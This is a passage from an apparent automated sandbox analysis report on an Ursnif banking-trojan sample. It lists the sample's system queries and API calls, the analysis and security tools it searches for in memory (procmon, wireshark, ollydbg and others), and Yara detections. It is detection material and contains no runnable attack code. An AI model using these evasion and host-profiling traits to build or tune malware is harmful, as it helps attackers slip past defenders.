Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56CD6 cpuid 21_2_00E56CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E566CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 21_2_00E566CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 21_2_00E56CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 21_2_0558E3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E55A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 21_2_00E55A5D

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif